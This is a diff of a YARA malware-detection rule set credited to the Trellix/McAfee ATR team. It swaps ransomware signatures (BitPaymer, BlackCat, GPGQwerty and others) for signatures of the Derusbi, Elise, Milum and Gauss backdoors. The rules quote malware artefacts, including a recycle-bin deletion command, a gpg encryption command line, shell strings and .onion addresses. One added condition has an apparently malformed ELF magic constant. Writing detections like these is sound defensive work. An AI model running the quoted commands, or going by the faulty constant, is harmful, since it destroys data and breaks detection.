-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH/CN=Red GmbH" and pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . thumbprint == "5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99" )
+		( uint32( 0 ) == 0x4464c457f ) and filesize < 200KB and all of them
 }
-rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the new Nefilim written in GO"
+		description = "Rule to detect Derusbi Linux Shared Memory creation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "a8809060-c646-5d54-88e7-c8054305ee6c"
-		date = "2020-07-13"
+		id = "8d2db62e-22fa-5bbe-ab65-f294fc911b82"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_NEFILIM.yar#L74-L98"
+		reference = "https://attack.mitre.org/software/S0021/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L107-L130"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099"
-		logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270"
+		logic_hash = "095af979728f3b71e3192140306e4aa76011e07a25b20b0c5b3b98db41411714"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Nefilim"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:ELF/Derusbi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { FF20476F206275696C642049443A20226A744368374D37436A4A5732634C5F636633374A2F49625946794336635A64735F4D796A56633461642F486B6D36694A4D39327847785F4F2D65746744692F664E37434C43622D59716E374D795947565A686F220A20FFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108766B83EC0CC744241400000000C7442418000000008B4424108400890424E88D0200008B44240485C0740789C183F8FF7514C744241400000000C74424180000000083C40CC3894C24088B44241083C004890424E8570200008B4424048B4C2408894C24148944241883C40CC3E8AE5A0400E979FFFFFFCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EC00000083EC108B44241885C00F84C30000008B4424148400890424E8FD0100008B44240485C0742E89C183F8FF74E38B44241839C10F85800000008B44241C894424048B44241483C004890424E88B12000083C410C3E8620303008B442414890424C744240400000000C7442408FFFFFFFFE8A61200000FB644240C84C07507E868030300EB8B8B44241C894424048B4424148D4804890C24E83F1200008B442418894424048B442414890424E82B120000E83603030083C410C38D05408E4E008904248D05B8CC510089442404E8DA3F02000F0B8D05408E4E008904248D05B0CC510089442404E8C03F02000F0BE899590400E9F4FEFFFFCCCCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B4424088B4C240CF00FB14D000F94442410C3CCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCCE90B000000CCCCCCCCCCCCCCCCCCCCCC8B6C24048B44240889C1F00FC1450001C1894C240CC3CCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B05000000008B7424088B7C240C8B45008B550489C389D101F311F9F00FC74D0075F1895C2410894C2414C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B442404A90700000074068B05000000000F6F000F7F4424080F77C3CCCCCCCCE9CBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9BBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C24048B442408874500C3CCCCCCCCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B4424040FBCC074058944240CC38B4424080FBCC0740883C0208944240CC3C744240C40000000C3CCCCCCCCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC8B4424048B0089442408C3CCCCCCCCCC83EC208B4424248B088B54242889CB01D1894C241C8B6804890424895C2404896C2408894C240C8B5C242C11DD896C2418896C2410E8160100000FB644241484C074C08B44241C894424308B4424188944243483C420C3CCCCCCCCCCCCCCCCCC83EC208B4424248B08894C24188B50048954241C890424894C2404895424088B5C2428895C240C8B6C242C896C2410E8BC0000000FB644241484C074C68B442418894424308B44241C8944243483C420C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCCE9DBFFFFFFCCCCCCCCCCCCCCCCCCCCCCE9EBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DBFEFFFFCCCCCCCCCCCCCCCCCCCCCCE9DB000000CCCCCCCCCCCCCCCCCCCCCCE97B000000CCCCCCCCCCCCCCCCCCCCCCE9CB000000CCCCCCCCCCCCCCCCCCCCCCE9BBFEFFFFCCCCCCCCCCCCCCCCCCCCCC8B6C2404F7C50700000074068B2D000000008B4424088B54240C8B5C24108B4C2414F00FC74D000F94442418C3CCCCCC8B5C24048B4424088B4C240CF00FB10B0F94442410C3CCCCCCCCCCCCCCCCCCCC8B5C24048B44240889C1F00FC10301C88944240CC3CCCCCCCCCCCCCCCCCCCCCC8B5C24048B44240887038944240CC3CCE9EBFFFFFFCCCCCCCCCCCCCCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B5C24048B4424088703C3CCCCCCCCCC8B442404A90700000074068B05000000008D5C24080F6F000F7F030F77C3CCCC8B442404A90700000074068B05000000000F6F4424080F7F000F77B800000000F00FC10424C3CCCCCCCCCCCCCCCCCCCC8B4424048A5C2408F00818C3CCCCCCCC8B4424048A5C2408F02018C3CCCCCCCC648B0D140000008B89000000003B610876098B4424088944240CC3E860550400EBDECCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240801000000E8AF4400008B44240C8944241C83C410C3E80E550400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240802000000E85F4400008B44240C8944241C83C410C3E8BE540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108762B83EC108B4424148904248B44241889442404C744240810000000E80F4400008B44240C8944241C83C410C3E86E540400EBBCCCCCCCCCCCCCCCCCCCCCCCCC83EC108D42048B008B4C2414890C248B4C2418894C240489442408E8D04300008B44240C8944241C83C410C3CCCCCCCC648B0D140000008B89000000003B6108762C83EC108B4424148B088B400489442408890C248B44241889442404E88E4300008B44240C8944241C83C410C3E8ED530400EBBBCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B600000083EC108B442414F30F10000F57C90F2EC175060F8B860000000F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240804000000E8C74200008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E80F530400E92AFFFFFFCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86B800000083EC108B442414F20F10000F57C9660F2EC175060F8B87000000660F2EC075027B5B648B05140000008B80000000008B40188B88940000008B909800000089909400000089CBC1E11131D989D331CAC1E90731D189DAC1EB1031CB8998980000008D041A8B4C241831C835A98E7FAA69C0CD76BAC28944241C83C410C38904248B44241889442404C744240808000000E8E54100008B44240C8944241C83C410C38B44241835A98E7FAA69C0CD76BAC28944241C83C410C3E82D520400E928FFFFFFCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E815FEFFFF8B44241083C0048B4C2408890424894C2404E8FEFDFFFF8B4424088944241883C40CC3E8CD510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B6108763C83EC0C8B44241084008904248B4C2414894C2404E895FEFFFF8B44241083C0088B4C2408890424894C2404E87EFEFFFF8B4424088944241883C40CC3E86D510400EBABCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86F200000083EC248B4424288B0885C974678B49048B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E8B2FA03008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8F46603008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E81E8E00008B44240C8B4C2408890C2489442404E87A3602000F0BE853500400E9EEFEFFFFCCCCCCCCCCCCCCCCCCCCCCCCCCCC648B0D140000008B89000000003B61080F86EF00000083EC248B4424288B0885C974648B59108B1385D274670FB6490FF6C120742983C0048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B40048904248B44242C35A98E7FAA894424048B02FFD08B44240869C0CD76BAC28944243083C424C38B44242C8944243083C424C3890C24E895F903008B4424088B4C2404C70424000000008D15A279500089542404C744240818000000894C240C89442410E8D76503008B4424188B4C2414894C241C894424208D05C0D24E008904248D44241C89442404E8018D00008B44240C8B4C2408890C2489442404E85D3502000F0BE8364F0400E9F1FEFFFFCC648B0D140000008B89000000003B61087606C644240C01C3 }
+		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and all of them
+		( uint32( 0 ) == 0x464C457F ) and filesize < 200KB and all of them
 }
-rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Strings : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect BitPaymer Ransomware"
+		description = "Rule to detect APT Derusbi Linux Strings"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "20b91cf2-2a84-55d9-8230-90d7b20a461f"
-		date = "2019-11-08"
+		id = "09e47580-9b20-5461-943e-32b932c36214"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Bitpaymer.yar#L1-L72"
+		reference = "https://attack.mitre.org/software/S0021/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L132-L173"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f"
+		logic_hash = "0e95497c44a0c1d85936a6a072063720a771b7e1eb8da2377e54577e3fc2764e"
 		score = 75
-		quality = 66
-		tags = "RANSOMWARE, FILE"
+		quality = 68
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/BitPaymer"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:ELF/Derusbi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "IEncrypt.dll" fullword wide
-		$op0 = { e8 5f f3 ff ff ff b6 e0 }
-		$op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 }
-		$op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff }
-		$pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii
-		$oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba }
-		$oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af }
-		$oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 }
-		$t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide
-		$ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 }
-		$ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e }
-		$ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 }
-		$random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii
-		$oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
-		$oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 }
-		$oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b }
-		$ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 }
-		$ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 }
-		$ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c }
-		$oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 }
-		$oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba }
-		$oy0 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oy1 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oy2 = { c7 06 cc 21 a6 00 c7 46 08 }
-		$oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 }
-		$oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 }
+		$a1 = "loadso" wide ascii fullword
+		$a2 = "\nuname -a\n\n" wide ascii
+		$a3 = "/dev/shm/.x11.id" wide ascii
+		$a4 = "LxMain64" wide ascii nocase
+		$a5 = "# \\u@\\h:\\w \\$ " wide ascii
+		$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
+		$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
+		$b3 = "ret %d" wide fullword
+		$b4 = "uname -a\n\n" wide ascii
+		$b5 = "/proc/%u/cmdline" wide ascii
+		$b6 = "/proc/self/exe" wide ascii
+		$b7 = "cp -a %s %s" wide ascii
+		$c1 = "/dev/pts/4" wide ascii fullword
+		$c2 = "/tmp/1408.log" wide ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB ) and ( $s1 and all of ( $op* ) ) or ( $pdb and all of ( $oj* ) ) or ( $t1 and all of ( $ok* ) ) or ( $random and all of ( $oi* ) ) or ( $random and all of ( $ou* ) ) or ( $random and all of ( $oa* ) and $ou0 ) or ( $random and all of ( $oy* ) ) or ( $random and all of ( $oh* ) ) or ( $random and $ou0 ) or ( $random and $oi1 )
+		uint32( 0 ) == 0x464C457F and filesize < 200KB and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
 }
-rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE
+rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Detect GPGQwerty ransomware"
-		author = "McAfee Labs"
-		id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2"
-		date = "2018-03-21"
+		description = "Rule to detect Elise APT based on the PDB reference"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_GPGQwerty.yar#L1-L26"
+		reference = "https://attack.mitre.org/software/S0081/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_elise_pdb.yar#L1-L29"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897"
+		hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b"
+		logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/GPGQwerty"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Elise"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$a = "gpg.exe –recipient qwerty  -o"
-		$b = "%s%s.%d.qwerty"
-		$c = "del /Q /F /S %s$recycle.bin"
-		$d = "cryz1@protonmail.com"
+		$pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb"
+		$pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb"
+		$pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb"
+		$pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb"
+		$pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE
+
+rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE
 {
 	meta:
-		description = "Detecting variants of Windows BlackCat malware"
-		author = " Trellix ATR"
-		id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98"
-		date = "2022-01-06"
-		modified = "2022-01-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24"
+		description = "Rule to detect Milum trojan from the Wildpressure operation"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "acc56237-a93a-55c0-a90c-11ca1da683db"
+		date = "2020-04-24"
+		modified = "2020-08-14"
+		reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_milum_wildpressure.yar#L3-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3"
+		hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
+		logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		malware_type = "Ransomware"
-		detection_name = "Ransom_Win_BlackCat"
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/Milum"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
-		$URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
-		$API = { 3a 7c d8 3f }
+		$pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3500KB and 1 of ( $URL* ) and $API
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and pe.imphash ( ) == "548d9f5f1e74f34b85612667335d41f2" and all of them
 }
-rule TRELLIX_ARC_Anatova_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the Anatova Ransomware"
+		description = "Rule to detect Gauss based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "6e3205aa-42e4-5449-877e-37494cdd096b"
-		date = "2019-01-22"
+		id = "209223cc-16e5-5596-8744-21ad71b5ec2a"
+		date = "2012-08-14"
 		modified = "2020-08-14"
-		reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Anatova.yar#L1-L25"
+		reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/gauss_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "97fb79ca6fc5d24384bf5ae3d01bf5e77f1d2c0716968681e79c097a7d95fb93"
-		logic_hash = "4fce15ad0ef2d3cb39f6092677f117308f847815cb2a5a491290a1f9d09776df"
+		hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28"
+		logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997"
 		score = 75
-		quality = 45
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Anatova"
-		actor_type = "Cybercrime"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Gauss"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$regex = /anatova[0-9]@tutanota.com/
+		$pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $regex
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE
+rule TRELLIX_ARC_STEALER_Credstealesy : STEALER
 {
 	meta:
-		description = "Ransomware encrypting Mongo Databases "
-		author = "Christiaan Beek - McAfee ATR team"
-		id = "4350a874-dd76-5379-af9f-f1d190385706"
-		date = "2019-04-25"
+		description = "Generic Rule to detect the CredStealer Malware"
+		author = "IsecG – McAfee Labs"
+		id = "90e23ed8-3243-519b-8eb4-9db5902c73d3"
+		date = "2015-05-08"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MONGOLOCK.yar#L1-L41"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/when-hackers-get-hacked-the-malware-servers-of-a-data-stealing-campaign/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_credstealer.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
